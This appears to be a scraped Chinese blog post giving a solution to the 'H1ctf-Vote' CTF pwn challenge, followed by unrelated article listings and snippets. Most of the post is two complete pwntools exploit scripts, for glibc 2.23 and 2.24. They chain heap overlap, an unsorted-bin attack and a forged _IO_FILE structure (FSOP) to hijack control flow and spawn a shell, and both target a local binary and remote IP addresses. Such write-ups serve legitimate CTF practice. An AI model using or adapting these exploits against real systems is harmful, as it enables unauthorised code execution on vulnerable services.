H1ctf-Vote
用来练习IO_FILE利用
glibc-2.23
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("/home/moonagirl/moonagirl/libc/libc_local_x64")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote')
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000) def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
# io.interactive()
show(0)
io.recvuntil("count: ")
libc.address = int(io.recvline()[:-1]) - main_arena_off
log.success("libc address: " + hex(libc.address))
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
log.success("heap address: " + hex(heap_address))
vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6
create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
vtable_addr = heap_address + 0x410 fake_file = IO_FILE_plus_struct()
fake_file._flags = u64("/bin/sh\x00")
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base = libc.symbols['_IO_list_all'] - 0x10
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = vtable_addr payload += str(fake_file) payload += p64(1)
payload += p64(2)
payload += p64(3)
payload += p64(libc.symbols["system"])
payload += '\n'
create(0x288, payload) # size 0x2A1
# now chunk3 removed from unsorted bin, unsorted bin only has chunk4
pause()
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(48))
io.interactive() if __name__ == "__main__":
pwnit()
pause()
glibc-2.24
# coding:utf-8
from pwn import *
from FILE import *
context.arch = 'amd64'
libc = ELF("./libc-2.24.so")
LOCAL = 1
if LOCAL:
# context.log_level = 'debug'
io = process('./vote',env={"LD_PRELOAD":"./libc-2.24.so"})
# __malloc_hook+68
main_arena_off = libc.symbols['__malloc_hook'] + 0x68
else:
main_arena_off = 0x3c4b78
#io = remote("47.90.103.10", 6000)
io = remote("47.97.190.1", 6000)
def z(a=''):
gdb.attach(io,a)
if a == '':
raw_input()
def mmenu(choice):
io.recvuntil("Action: ")
io.sendline(str(choice)) def create(msize, content):
mmenu(0)
io.recvuntil("the name's size: ")
io.sendline(str(msize))
io.recvuntil("Please enter the name: ")
io.send(content) def show(idx):
mmenu(1)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def vote(idx):
mmenu(2)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def result():
mmenu(3) def vcancel(idx):
mmenu(4)
io.recvuntil("Please enter the index: ")
io.sendline(str(idx)) def pwnit():
create(0xE8, 'a0\n')
create(0x18, 'a1\n')
create(0xE8, 'a2\n')
create(0xE8, 'a3\n')
pay4load = '4'*0x180 + p64(0) + p64(0x81) + '\n'
create(0x208, pay4load)
create(0x30, 'a5\n')
vcancel(0)
vcancel(2)
show(0)
io.recvuntil("count: ")
libc_base = int(io.recvline()[:-1]) - main_arena_off
io.recvuntil("time: ")
heap_address = int(io.recvline()[:-1]) - 0x130
system = libc.symbols['system']
_IO_list_all= libc.symbols['_IO_list_all']
binsh = libc.search('/bin/sh\x00').next()
_IO_str_jumps = 0x3BE4C0 + libc_base system = libc_base+libc.symbols['system']
_IO_list_all=libc_base+libc.symbols['_IO_list_all']
# _IO_str_jumps = libc_base+libc.symbols['_IO_str_jumps']
binsh = libc_base+libc.search('/bin/sh\x00').next() vcancel(3)
# overlap
fake_chunk = '6'*0xE0
fake_chunk += p64(0) + p64(0x2A1) # change size bigger
fake_chunk += p64(0xFFFFFFFFFFFFFFFF) + p64(0x555555)
fake_chunk += '\n'
create(0x1E8, fake_chunk) # 6 create(0xE8, 'a7\n') # clear unsorted bin
vcancel(3)
vcancel(4) # now unsorted bin have 2 chunks
# unsorted bin attack
payload = 'a'*0xE0
fake_file = IO_FILE_plus_struct()
fake_file._flags = 0
fake_file._IO_read_ptr = 0x61
fake_file._IO_read_base =_IO_list_all-0x10
fake_file._IO_buf_base = binsh
fake_file._mode = 0
fake_file._IO_write_base = 0
fake_file._IO_write_ptr = 1
fake_file.vtable = _IO_str_jumps-8
payload+=str(fake_file).ljust(0xe8,'\x00')+p64(system) create(0x288, payload) # size 0x2A1
# io.interactive()
# pause()
create(0, 'get shell')
io.interactive()
if __name__ == "__main__":
pwnit()
# pause()
.
H1ctf-Vote的更多相关文章
- BZOJ-1934 Vote 善意的投票 最大流+建图
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MB Submit: 1551 Solved: 951 [Submit][S ...
- bzoj1934: [Shoi2007]Vote 善意的投票
最大流..建图方式都是玄学啊.. //Dinic是O(n2m)的. #include<cstdio> #include<cstring> #include<cctype& ...
- 最小投票BZOJ 1934([Shoi2007]Vote 善意的投票-最小割)
上班之余抽点时间出来写写博文,希望对新接触的朋友有帮助.今天在这里和大家一起学习一下最小投票 1934: [Shoi2007]Vote 好心的投票 Time Limit: 1 Sec Memory L ...
- [POLITICS] S Korea lawmakers vote to impeach leader
South Korea's Parliament has voted to impeach President Park Geun-hye. The National Assembly motion ...
- BZOJ 1934: [Shoi2007]Vote 善意的投票 最小割
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 256 MB 题目连接 http://www.lydsy.com/JudgeOnl ...
- A Linear Time Majority Vote Algorithm
介绍一种算法,它可以在线性时间和常数空间内,在一个数组内找出出现次数超过一半的某个数字. 要解决这个问题并不难,可以使用排序或哈希,但是这两种算法都不能同时满足时间或空间的要求. 然而,该算法(A L ...
- 11gR2更换OCR和VOTE
11gR2开始,OCR和VOTE它们被存储在ASM磁盘组,因此,更换OCR有两种方法,第一是使用ASM磁盘组drop disk数据重组后,另一种方法是OCR迁移到另一个磁盘组 第一种:add disk ...
- WeMall微商城源码投票插件Vote的主要源码
WeMall微信商城源码投票插件Vote,用于商城的签到系统,分享了部分比较重要的代码,供技术员学习参考 AdminController.class.php <?php namespace Ad ...
- 1934: [Shoi2007]Vote 善意的投票
1934: [Shoi2007]Vote 善意的投票 Time Limit: 1 Sec Memory Limit: 64 MBSubmit: 1174 Solved: 723[Submit][S ...
- Boyer-Moore Majority Vote Algorithm
介绍算法之前, 我们来看一个场景, 假设您有一个未排序的列表.您想知道列表中是否存在一个数量占列表的总数一半以上的元素, 我们称这样一个列表元素为 Majority 元素.如果有这样一个元素, 求出它 ...
随机推荐
- 一个APK反编译利器Apktool
一个APK反编译利器Apktool APK 本地化 [http://www.andmoto.com/viewthread.php?tid=3873] 说起APK的汉化,目前大部分教程都是让用H ...
- 分层图最短路【bzoj2662】[BeiJing wc2012]冻结
分层图最短路[bzoj2662][BeiJing wc2012]冻结 Description "我要成为魔法少女!" "那么,以灵魂为代价,你希望得到什么?" ...
- 最全 MySQL 优化方法,从此优化不再难
说起MySQL的查询优化,相信大家收藏了一堆奇技淫巧:不能使用SELECT *.不使用NULL字段.合理创建索引.为字段选择合适的数据类型..... 你是否真的理解这些优化技巧?是否理解其背后的工作原 ...
- Zabbix之CentOS7.3下yum安装Zabbix3.5
Zabbix特点介绍 (此介绍来源于https://www.zabbix.com/documentation/3.4/zh/manual/introduction/features) 概述Zabbix ...
- Codeforces Round #364 (Div. 2) C
Description Sergei B., the young coach of Pokemons, has found the big house which consists of n flat ...
- 05.Spring 资源加载 - Resource
基本概念 Spring 把所有能记录信息的载体,如各种类型的文件.二进制流等都称为资源. 对 Spring 开发者来说,最常用的资源就是 Spring 配置文件(通常是一份 XML 格式的文件). S ...
- Gym 100971D Laying Cables 二分 || 单调栈
要求找出每个a[i],找到离他最近而且权值比它大的点,若距离相同,输出权利最大的那个 我的做法有点复杂,时间也要500+ms,因为只要时间花在了map上. 具体思路是模拟一颗树的建立过程,对于权值最大 ...
- EditPlus常用操作
EditPlus注册码在线生成 http://www.jb51.net/tools/editplus/ 随意填写个用户名,生成对应的密码就可以使用editplus了 EditPlus常用快捷键 编代码 ...
- Unity3d开发的第一个实例
1.untiy3d开发环境配置好以后,开始我的第一个开发实例 2.在Hirearch---create---3DObject---Cube,在场景中创建一个正方体 3.project---create ...
- .bak文件数据还原
.bak文件还原(见下图) 1.连接上数据库,右键数据库,选择新建数据库,输入你要还原数据库的名称 2.数据库右键-->任务-->还原-->数据库,弹出窗口选择[源设备],选择.ba ...